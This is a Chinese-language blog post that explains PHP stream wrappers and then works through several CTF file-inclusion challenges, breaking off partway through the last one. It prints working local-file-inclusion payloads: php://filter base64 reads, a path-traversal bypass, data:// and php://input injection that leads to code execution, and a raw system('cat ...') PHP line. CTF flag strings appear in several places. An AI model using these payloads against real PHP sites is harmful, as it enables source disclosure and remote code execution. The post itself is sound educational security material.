<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>php伪协议 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="PHP伪协议简介PHP伪协议是PHP中一种特殊的流封装协议，它用于访问各种流、输入、输出、过滤等资源。这些伪协议不是真正的网络协议，而是PHP内部用于抽象和访问数据流的方式。伪协议让开发者能够通过类似URL的字符串来访问这些资源。 以下是一些常见的PHP伪协议：  file:&#x2F;&#x2F; - 用于访问本地文件系统上的文件。  http:&#x2F;&#x2F; 和 https:&amp;#x2">
<meta property="og:type" content="article">
<meta property="og:title" content="php伪协议">
<meta property="og:url" content="http://example.com/2024/07/02/chenge-first-blog/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="PHP伪协议简介PHP伪协议是PHP中一种特殊的流封装协议，它用于访问各种流、输入、输出、过滤等资源。这些伪协议不是真正的网络协议，而是PHP内部用于抽象和访问数据流的方式。伪协议让开发者能够通过类似URL的字符串来访问这些资源。 以下是一些常见的PHP伪协议：  file:&#x2F;&#x2F; - 用于访问本地文件系统上的文件。  http:&#x2F;&#x2F; 和 https:&amp;#x2">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/image-20240513195502314.png">
<meta property="og:image" content="http://example.com/images/image-20240513200446217.png">
<meta property="og:image" content="http://example.com/images/image-20240513205753428.png">
<meta property="og:image" content="http://example.com/images/image-20240513210928969.png">
<meta property="og:image" content="http://example.com/images/image-20240515093042738.png">
<meta property="og:image" content="http://example.com/images/image-20240515093109851.png">
<meta property="og:image" content="http://example.com/images/image-20240515093620463.png">
<meta property="og:image" content="http://example.com/images/image-20240515093722236.png">
<meta property="og:image" content="http://example.com/images/image-20240517183336417.png">
<meta property="og:image" content="http://example.com/images/image-20240517183323789.png">
<meta property="og:image" content="http://example.com/images/image-20240517183909856.png">
<meta property="og:image" content="http://example.com/images/image-20240517184040072.png">
<meta property="og:image" content="http://example.com/images/image-20240517184120708.png">
<meta property="og:image" content="http://example.com/images/image-20240517184936308.png">
<meta property="og:image" content="http://example.com/images/image-20240517185459919.png">
<meta property="og:image" content="http://example.com/images/image-20240514142424024.png">
<meta property="og:image" content="http://example.com/images/image-20240514143243027.png">
<meta property="og:image" content="http://example.com/images/image-20240514143547264.png">
<meta property="og:image" content="http://example.com/images/image-20240514143813323.png">
<meta property="og:image" content="http://example.com/images/image-20240514144230635.png">
<meta property="og:image" content="http://example.com/images/image-20240514144752108.png">
<meta property="og:image" content="http://example.com/images/image-20240516154802767.png">
<meta property="og:image" content="http://example.com/images/image-20240516155536007.png">
<meta property="og:image" content="http://example.com/images/image-20240516155558779.png">
<meta property="og:image" content="http://example.com/images/image-20240516155745976.png">
<meta property="og:image" content="http://example.com/images/image-20240516155855598.png">
<meta property="og:image" content="http://example.com/images/image-20240516160049925.png">
<meta property="article:published_time" content="2024-07-02T13:24:44.000Z">
<meta property="article:modified_time" content="2024-07-02T13:31:18.927Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/image-20240513195502314.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-chenge-first-blog" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/07/02/chenge-first-blog/" class="article-date">
  <time class="dt-published" datetime="2024-07-02T13:24:44.000Z" itemprop="datePublished">2024-07-02</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      php伪协议
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="PHP伪协议"><a href="#PHP伪协议" class="headerlink" title="PHP伪协议"></a>PHP伪协议</h1><h2 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h2><p>PHP伪协议是PHP中一种特殊的流封装协议，它用于访问各种流、输入、输出、过滤等资源。这些伪协议不是真正的网络协议，而是PHP内部用于抽象和访问数据流的方式。伪协议让开发者能够通过类似URL的字符串来访问这些资源。</p>
<p>以下是一些常见的PHP伪协议：</p>
<ol>
<li><p><strong>file:&#x2F;&#x2F;</strong> - 用于访问本地文件系统上的文件。</p>
</li>
<li><p><strong>http:&#x2F;&#x2F; 和 https:&#x2F;&#x2F;</strong> - 用于通过HTTP或HTTPS协议访问网络资源。</p>
</li>
<li><p><strong>php:&#x2F;&#x2F;</strong> - 用于访问各种内部流：</p>
<ul>
<li><strong>php:&#x2F;&#x2F;input</strong> - 用于访问请求的原始数据。在处理POST请求的非加工数据时特别有用。</li>
<li><strong>php:&#x2F;&#x2F;output</strong> - 用于写入到输出缓冲区。</li>
<li><strong>php:&#x2F;&#x2F;memory</strong> 和 <strong>php:&#x2F;&#x2F;temp</strong> - 用于存储数据到内存或临时文件中。如果数据超出了内存限制，php:&#x2F;&#x2F;temp会将数据移动到临时文件中。</li>
<li><strong>php:&#x2F;&#x2F;stderr</strong>, <strong>php:&#x2F;&#x2F;stdout</strong>, 和 <strong>php:&#x2F;&#x2F;stdin</strong> - 分别用于访问标准错误、标准输出和标准输入流。</li>
</ul>
</li>
<li><p><strong>php:&#x2F;&#x2F;filter</strong> - 用于将过滤器应用于读取或写入操作。可以链式调用多个过滤器，用于转换流数据，如编码转换、加密解密等。</p>
</li>
</ol>
<p>通过这些伪协议，PHP可以以一种标准和简洁的方式处理各种流数据，不仅限于文件，还包括获取请求数据、输出数据等。这在Web开发中尤为有用，因为它允许开发者以灵活的方式处理HTTP请求和响应以及其他类型的数据流。</p>
<h2 id="优点"><a href="#优点" class="headerlink" title="优点"></a>优点</h2><p>PHP 所提供的伪协议带来的优点整理如下：</p>
<table>
<thead>
<tr>
<th><strong>项目</strong></th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>一致性</td>
<td>开发者 <code>不必为不同的数据流编写特定的处理代码</code>。通过使用伪协议，开发者能够使用 <code>熟悉的</code>、<code>标准的</code> 文件操作函数来处理各种数据。</td>
</tr>
<tr>
<td>灵活性</td>
<td>伪协议提供了 <code>多种不同的方式来访问和处理数据</code>。例如，您可以使用 <code>php://stdin 和 php://stdout</code> 来处理标准输入和标准输出；使用<code>php://memory 和 php://temp</code>来在内存中或临时文件中处理数据。这种灵活性允许开发人员根据具体需求选择最合适的方式来处理数据。</td>
</tr>
<tr>
<td>优化工作流</td>
<td>php:&#x2F;&#x2F;input 伪协议可以 直接读取原始的 POST 数据，而不需要依赖特定的全局变量，这样可以在不同的上下文中更灵活地处理输入数据；php:&#x2F;&#x2F;temp 和 php:&#x2F;&#x2F;memory 伪协议允许在内存中 创建临时数据流，而 无需实际文件存储。这对于处理临时数据或进行中间数据处理非常有用，而 不会产生硬盘 I&#x2F;O开销。</td>
</tr>
</tbody></table>
<h2 id="php-filter"><a href="#php-filter" class="headerlink" title="php:&#x2F;&#x2F;filter"></a>php:&#x2F;&#x2F;filter</h2><h3 id="基本格式"><a href="#基本格式" class="headerlink" title="基本格式"></a>基本格式</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/read=?/resource=?</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20240513195502314.png" alt="image-20240513195502314"></p>
<p><strong>常用语法</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//filter/read=convert.base64-encode/resource=index.php</span></span><br><span class="line">php:<span class="comment">//filter/resource=index.php</span></span><br></pre></td></tr></table></figure>

<p><strong>注意</strong></p>
<p>利用filter协议读文件±，将index.php通过<strong>base64编码后进行输出</strong>。这样做的好处就是如果不进行编码，文件包含后就不会有输出结果，而是当做<strong>php文件执行</strong>了，而通过编码后则可以读取文件源码。而使用的convert.base64-encode，就是一种过滤器。</p>
<p><strong>特例</strong></p>
<p>当网站对”read”,”base64”进行过滤，就需要使用其他转换器</p>
<p><strong>convery.iconv.</strong>*</p>
<p>用法</p>
<ul>
<li>convert.iconv.<input-encoding>.<output-encoding> </li>
<li>convert.iconv.<input-encoding>&#x2F;<output-encoding></li>
</ul>
<p>支持的编码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">UCS-4*</span><br><span class="line">UCS-4BE</span><br><span class="line">UCS-4LE*</span><br><span class="line">UCS-2</span><br><span class="line">UCS-2BE</span><br><span class="line">UCS-2LE</span><br><span class="line">UTF-32*</span><br><span class="line">UTF-32BE*</span><br><span class="line">UTF-32LE*</span><br><span class="line">UTF-16*</span><br><span class="line">UTF-16BE*</span><br><span class="line">UTF-16LE*</span><br><span class="line">UTF-7</span><br><span class="line">UTF7-IMAP</span><br><span class="line">UTF-8*</span><br><span class="line">ASCII*</span><br></pre></td></tr></table></figure>



<h4 id="靶场"><a href="#靶场" class="headerlink" title="靶场"></a>靶场</h4><p><strong>fileinclude</strong></p>
<p><img src="/images/image-20240513200446217.png" alt="image-20240513200446217"></p>
<p>敏感信息:存在flag.php ,文件目录,language</p>
<p>F12</p>
<p><img src="/images/image-20240513205753428.png" alt="image-20240513205753428"></p>
<p>这里用了ai解读了一下	</p>
<p>这段PHP代码的作用是根据用户的语言偏好设置来加载不同的语言文件，并在最后读取并输出’index.php’文件的内容。下面是对代码的详细解释：</p>
<ol>
<li><p><code>if( !ini_get(&#39;display_errors&#39;) ) &#123; ini_set(&#39;display_errors&#39;, &#39;On&#39;); &#125;</code>: 这段代码检查PHP配置中的<code>display_errors</code>设置是否关闭。如果关闭了，它会将<code>display_errors</code>设置为<code>On</code>，即开启错误显示。这是为了在开发过程中能够看到任何可能发生的错误。</p>
</li>
<li><p><code>error_reporting(E_ALL);</code>: 这行代码设置错误报告级别为<code>E_ALL</code>，意味着将报告所有类型的错误。</p>
</li>
<li><p><code>$lan = $_COOKIE[&#39;language&#39;];</code>: 这行代码从用户的浏览器中获取名为<code>language</code>的cookie值，并将其存储在变量<code>$lan</code>中。</p>
</li>
<li><p><code>if(!$lan) &#123; @setcookie(&quot;language&quot;,&quot;english&quot;); @include(&quot;english.php&quot;); &#125;</code>: 如果<code>$lan</code>变量为空（即没有设置<code>language</code>cookie），这段代码会设置一个名为<code>language</code>的cookie，值为<code>english</code>，并尝试包含<code>english.php</code>文件。<code>@</code>符号用于抑制可能发生的错误，例如如果<code>english.php</code>文件不存在。</p>
</li>
<li><p><code>else &#123; @include($lan.&quot;.php&quot;); &#125;</code>: 如果<code>$lan</code>变量不为空（即已经设置了<code>language</code>cookie），这段代码会尝试包含与cookie值相对应的语言文件。例如，如果<code>language</code>cookie的值是<code>french</code>，那么它会尝试包含<code>french.php</code>文件。同样，<code>@</code>符号用于抑制可能的错误。</p>
</li>
<li><p><code>$x=file_get_contents(&#39;index.php&#39;); echo $x;</code>: 这段代码使用<code>file_get_contents</code>函数读取<code>index.php</code>文件的内容，并将内容存储在变量<code>$x</code>中，然后通过<code>echo</code>语句输出<code>$x</code>的内容。</p>
</li>
</ol>
<p>总的来说，这段代码的目的是根据用户的语言偏好来动态加载不同的语言文件，并在最后输出<code>index.php</code>文件的内容。如果用户的语言偏好没有设置，默认会加载英文语言文件。</p>
<p>大体意思为,要通过创建一个cookie为language 的值,也是本题的突破口.</p>
<p><strong>$lan &#x3D; $_COOKIE[‘language’];</strong></p>
<p>在cookie中的内容<strong>language</strong> 会被传到变量$<a target="_blank" rel="noopener" href="https://so.csdn.net/so/search?q=lan&spm=1001.2101.3001.7020">lan</a>，继而在第23行**@include($lan.”.php”);**被调用与执行，因此cookie变量中很适合写入读取flag.php的payload~</p>
<p>根据前面的模板则可以构造</p>
<p>cookie</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;名称&quot;</span>: language</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;值&quot;</span>: <span class="number">2</span></span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20240513210928969.png" alt="image-20240513210928969"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PD9waHANCiRmbGFnPSJjeWJlcnBlYWNle2ZkNTdjMmU4MzhjODVhNDg2NTM2OWJjMWE3YjcwN2ZhfSI7DQo/Pg==</span><br></pre></td></tr></table></figure>

<p>base64解码后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$flag=&quot;cyberpeace&#123;fd57c2e838c85a4865369bc1a7b707fa&#125;&quot;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<p><strong>file_include</strong></p>
<p><img src="/images/image-20240515093042738.png" alt="image-20240515093042738"></p>
<p><img src="/images/image-20240515093109851.png" alt="image-20240515093109851"></p>
<p>直接使用伪协议，发现被过滤了，那就尝试其他过滤器，</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?filename=php://filter/convert.iconv.utf8*.utf16/resource=./check.php</span><br></pre></td></tr></table></figure>

<p>结果发现只是出现了过滤源码</p>
<p><img src="/images/image-20240515093620463.png" alt="image-20240515093620463"></p>
<p>flag并不在里面</p>
<p>那么就试试flag.php</p>
<p><img src="/images/image-20240515093722236.png" alt="image-20240515093722236"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag=cyberpeace&#123;634065b83d0e7b3821f16e560f8f2755&#125;</span><br></pre></td></tr></table></figure>



<p>**had a bad day ** </p>
<p><img src="/images/image-20240517183336417.png" alt="image-20240517183336417"></p>
<p><img src="/images/image-20240517183323789.png" alt="image-20240517183323789"></p>
<p>有可能是伪协议，而且现在知道有两个参数，index ，woofers ， meowers 并且 每次图片都不一样</p>
<p>所以先尝试·读取index的源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?category=php://filter/read=convert.base64-encode/resource=index.php</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20240517183909856.png" alt="image-20240517183909856"></p>
<p>说明可以注入，并且我们的传参被他加上了.php 这样的话就删掉就好了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/index.php?category=php://filter/read=convert.base64-encode/resource=index</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20240517184040072.png" alt="image-20240517184040072"></p>
<p><img src="/images/image-20240517184120708.png" alt="image-20240517184120708"></p>
<p>源码出现了，提取关键部分</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">			<span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;category&#x27;</span>];</span><br><span class="line"></span><br><span class="line">			<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$file</span>))</span><br><span class="line">			&#123;</span><br><span class="line">				<span class="keyword">if</span>( <span class="title function_ invoke__">strpos</span>( <span class="variable">$file</span>, <span class="string">&quot;woofers&quot;</span> ) !==  <span class="literal">false</span> || <span class="title function_ invoke__">strpos</span>( <span class="variable">$file</span>, <span class="string">&quot;meowers&quot;</span> ) !==  <span class="literal">false</span> || <span class="title function_ invoke__">strpos</span>( <span class="variable">$file</span>, <span class="string">&quot;index&quot;</span>))&#123;</span><br><span class="line">					<span class="keyword">include</span> (<span class="variable">$file</span> . <span class="string">&#x27;.php&#x27;</span>);</span><br><span class="line">				&#125;</span><br><span class="line">				<span class="keyword">else</span>&#123;</span><br><span class="line">					<span class="keyword">echo</span> <span class="string">&quot;Sorry, we currently only support woofers and meowers.&quot;</span>;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>大概意思就是我传的参数中必须有index ，woofers，  meowers，这就好办了&#x2F;</p>
<p>&#x2F;是下一目录<br>..&#x2F;是上一目录</p>
<p>不说就是flag.php</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?category=woofers/../flag</span><br></pre></td></tr></table></figure>



<p><img src="/images/image-20240517184936308.png" alt="image-20240517184936308"></p>
<p>说明存在</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20240517185459919.png" alt="image-20240517185459919"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- Can you read this flag? --&gt;</span><br><span class="line">&lt;?php</span><br><span class="line"> // flag&#123;595fb0aa-4b97-4ed6-abd7-4e256ba49ae1&#125;</span><br><span class="line">?&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="php-input"><a href="#php-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h2><p>php:&#x2F;&#x2F;input可以访问请求的原始数据的只读流，将post请求的数据当作php代码执行。当传入的参数作为文件名打开时，可以将参数设为php:&#x2F;&#x2F;input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。	</p>
<p>在 PHP 中，php:&#x2F;&#x2F;input 是一个只读流，它允许你访问原始的 HTTP 请求体。这个特性是独立于 HTTP 请求的方法的，意味着它不仅可以在 POST 请求中使用，也可以在 GET 或其他 HTTP 方法的请求中使用。</p>
<p>通常，我们将 php:&#x2F;&#x2F;input 与 POST 请求关联起来，因为 POST 请求常用于提交表单数据或上传文件，这些数据通常包含在请求体中。然而，php:&#x2F;&#x2F;input 的使用并不限于 POST 请求。无论是 GET、PUT、DELETE，还是其他 HTTP 方法，只要请求包含了请求体，php:&#x2F;&#x2F;input 都可以用来访问这些数据。</p>
<p>GET 请求也可以携带请求体	<br>值得注意的是，GET 请求通常不包含请求体，因为 GET 方法主要用于从服务器检索数据，其数据通常通过 URL 的查询字符串传递。然而，技术上讲，HTTP 规范并没有禁止 GET 请求携带请求体，虽然这不是常见的做法。如果一个 GET 请求异常地包含了请求体，那么 php:&#x2F;&#x2F;input 仍然可以用来访问这些数据。</p>
<p><strong>基本格式</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:<span class="comment">//input</span></span><br></pre></td></tr></table></figure>

<h2 id="data"><a href="#data" class="headerlink" title="data:&#x2F;&#x2F;"></a>data:&#x2F;&#x2F;</h2><ul>
<li><p>data:&#x2F;&#x2F;伪协议，是数据流封装器，和php:&#x2F;&#x2F;相似，都是利用了流的概念，将原本的include的文件流重定向到了用户可控制的输入流中，简单来说就是执行文件的包含方法包含了你的输入流，通过包含你输入的payload来实现目的。</p>
</li>
<li><p>条件：</p>
</li>
<li><p><code>allow_url_fopen</code>:on</p>
<p><code>allow_url_include</code> :on</p>
</li>
</ul>
<p><strong>基本格式</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">data:<span class="comment">//text/plain,</span></span><br><span class="line">data:<span class="comment">//text/plain;base64,</span></span><br></pre></td></tr></table></figure>

<p><strong>示例</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">　1）eg: http://127.0.0.1/include.php?file=data://text/plain,&lt;?php%20phpinfo();?&gt;         ##会向file中输入文本数据流&lt;?php%20phpinfo();?&gt;</span><br><span class="line"></span><br><span class="line">　　2）eg:http://127.0.0.1/include.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b   #会向file中输入base64解码后的PD9waHAgcGhwaW5mbygpOz8%2b </span><br></pre></td></tr></table></figure>

<h2 id="靶场-1"><a href="#靶场-1" class="headerlink" title="靶场"></a>靶场</h2><p>攻防世界：fileclude</p>
<p><img src="/images/image-20240514142424024.png" alt="image-20240514142424024"></p>
<p>这段PHP代码是一个典型的CTF（Capture The Flag）挑战中的一个环节，通常用于测试参赛者的Web安全知识和漏洞利用技能。下面是对这段代码的详细解释：</p>
<ol>
<li><p><code>include(&quot;flag.php&quot;);</code>：这行代码将包含一个名为<code>flag.php</code>的文件，该文件可能包含一个特定的字符串，即“flag”，这是CTF比赛中的常见元素，参赛者需要找到并提交这个flag以证明他们解决了挑战。</p>
</li>
<li><p><code>highlight_file(__FILE__);</code>：这行代码使用<code>highlight_file</code>函数来高亮显示当前文件的源代码。这在CTF中很常见，因为它允许参赛者直接查看挑战的源代码，从而理解挑战的要求和逻辑。</p>
</li>
<li><p><code>if(isset($_GET[&quot;file1&quot;]) &amp;&amp; isset($_GET[&quot;file2&quot;]))</code>：这个条件语句检查是否通过GET请求传递了两个参数<code>file1</code>和<code>file2</code>。如果这两个参数都存在，则执行接下来的代码块。</p>
</li>
<li><p><code>$file1 = $_GET[&quot;file1&quot;];</code> 和 <code>$file2 = $_GET[&quot;file2&quot;];</code>：这两行代码将GET请求中的<code>file1</code>和<code>file2</code>参数的值分别赋给变量<code>$file1</code>和<code>$file2</code>。</p>
</li>
<li><p><code>if(!empty($file1) &amp;&amp; !empty($file2))</code>：这个条件语句检查<code>$file1</code>和<code>$file2</code>是否都不为空。如果两个文件名都不为空，则继续执行。</p>
</li>
<li><p><code>if(file_get_contents($file2) === &quot;hello ctf&quot;)</code>：这行代码使用<code>file_get_contents</code>函数读取<code>$file2</code>指定的文件内容，并检查该内容是否严格等于字符串”hello ctf”。如果内容匹配，则执行下一行代码。</p>
</li>
<li><p><code>include($file1);</code>：如果<code>$file2</code>的内容匹配”hello ctf”，则这行代码将包含并执行<code>$file1</code>指定的文件。这可能是一个潜在的安全风险，因为如果攻击者能够控制<code>$file1</code>的值，他们可能会包含恶意文件或利用其他漏洞。</p>
</li>
<li><p><code>else die(&quot;NONONO&quot;);</code>：如果任何前面的条件不满足（例如，没有提供<code>file1</code>和<code>file2</code>，或者<code>file2</code>的内容不匹配”hello ctf”），则程序将终止并输出”NONONO”。</p>
</li>
</ol>
<p>在CTF挑战中，参赛者通常需要找到一种方法来满足这些条件，以便能够读取或执行包含flag的文件。这可能涉及到文件包含漏洞的利用、文件内容的伪造或其他安全漏洞的利用。</p>
<p>get 传参  include 明显可以设置伪协议<br>因为要执行file1，所以可以设置他，让他执行读取flag.php，这就涉及到php:&#x2F;&#x2F;filter</p>
<p>所以payload1</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file1=php:<span class="comment">//filter/read=convert.base64-encode/resource=flag.php</span></span><br></pre></td></tr></table></figure>

<p>而payload2 有两种解法，分别涉及php:&#x2F;&#x2F;input和data:&#x2F;&#x2F;</p>
<p><strong>方法一</strong></p>
<p>php:&#x2F;&#x2F;input 是可以接受post传参赋予变量的</p>
<p>这里推荐使用火狐浏览器并下载max hackbar </p>
<p><img src="/images/image-20240514143243027.png" alt="image-20240514143243027"></p>
<p>构造payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file1=php://filter/read=convert.base64-encode/resource=flag.php&amp;file2=php://input</span><br></pre></td></tr></table></figure>

<p><img src="/images/image-20240514143547264.png" alt="image-20240514143547264"></p>
<p><img src="/images/image-20240514143813323.png" alt="image-20240514143813323"></p>
<p><img src="/images/image-20240514144230635.png" alt="image-20240514144230635"></p>
<p>base64解码后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo &quot;WRONG WAY!&quot;;</span><br><span class="line">// $flag = cyberpeace&#123;c48634e20f8d5bc6000913931ce2bfa7&#125;</span><br></pre></td></tr></table></figure>

<p>** 方法二**</p>
<p>通过data:&#x2F;&#x2F; 传值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file1=php://filter/read=convert.base64-encode/resource=flag.php&amp;file2=data://text/plain,hello ctf</span><br></pre></td></tr></table></figure>



<p><img src="/images/image-20240514144752108.png" alt="image-20240514144752108"></p>
<p><strong>Web_php_include</strong></p>
<p><img src="/images/image-20240516154802767.png" alt="image-20240516154802767"></p>
<p>这段PHP代码是一个简单的脚本，它执行以下操作：</p>
<ol>
<li><p><code>show_source(__FILE__);</code>: 这行代码使用<code>show_source</code>函数（它是<code>highlight_file</code>函数的别名）来显示当前执行脚本的源代码。<code>__FILE__</code>是一个魔术常量，它返回当前脚本的路径。</p>
</li>
<li><p><code>echo $_GET[&#39;hello&#39;];</code>: 这行代码尝试输出通过GET请求传递的名为<code>hello</code>的参数的值。如果请求中没有包含<code>hello</code>参数，或者参数值不是一个有效的字符串，这行代码可能会导致错误。</p>
</li>
<li><p><code>$page=$_GET[&#39;page&#39;];</code>: 这行代码将通过GET请求传递的名为<code>page</code>的参数的值赋给变量<code>$page</code>。这个参数的值将用于后续的<code>include</code>语句。</p>
</li>
<li><p><code>while (strstr($page, &quot;php://&quot;)) &#123; $page=str_replace(&quot;php://&quot;, &quot;&quot;, $page); &#125;</code>: 这是一个循环，它会检查<code>$page</code>变量的值是否包含字符串<code>php://</code>。如果包含，它将使用<code>str_replace</code>函数将所有的<code>php://</code>替换为空字符串，从而从<code>$page</code>中移除<code>php://</code>。这个操作可能是为了防止通过<code>php://input</code>或<code>php://filter</code>等PHP伪协议进行攻击。</p>
</li>
<li><p><code>include($page);</code>: 这行代码尝试包含由<code>$page</code>变量指定的文件。如果<code>$page</code>包含一个有效的文件路径，那么该文件的内容将被包含并执行。如果路径无效，或者指向一个不存在的文件，这行代码将导致一个致命错误。</p>
</li>
</ol>
<p><strong>安全警告</strong>: 这段代码存在严重的安全风险，因为它允许用户通过<code>page</code>参数指定要包含的文件。如果攻击者能够控制<code>page</code>参数的值，他们可以构造一个恶意路径，导致服务器执行任意代码。这种类型的漏洞被称为远程文件包含（Remote File Inclusion, RFI）漏洞。</p>
<p>为了防止这种攻击，应该对用户提供的所有输入进行严格的验证和过滤，确保只能包含可信的文件。通常，这可以通过白名单机制来实现，即只允许包含特定的、预定义的文件。此外，应该避免使用用户提供的输入来构造文件路径，特别是在<code>include</code>、<code>require</code>等函数中。</p>
<p><strong>理解</strong></p>
<p>我们要绕过php:&#x2F;&#x2F;过滤，</p>
<p><strong>方法一</strong><br>大小写绕过<br>他只禁用了小写，大写依旧可以<br><strong>提醒</strong><br>不要直接使用url栏中的get传参<br>可以使用burp抓包，或者hackbar</p>
<p>由于不知道flag在哪<br>所以使用命令</p>
<p><img src="/images/image-20240516155536007.png" alt="image-20240516155536007"></p>
<p><img src="/images/image-20240516155558779.png" alt="image-20240516155558779"></p>
<p>第一个就可以，所以我们可以尝试读取。</p>
<p>有两办法</p>
<ul>
<li><p>1<br><img src="/images/image-20240516155745976.png" alt="image-20240516155745976"></p>
<?php system("cat fl4gisisish3r3.php")?>
<p>通过查看网站源码<br><img src="/images/image-20240516155855598.png" alt="image-20240516155855598"></p>
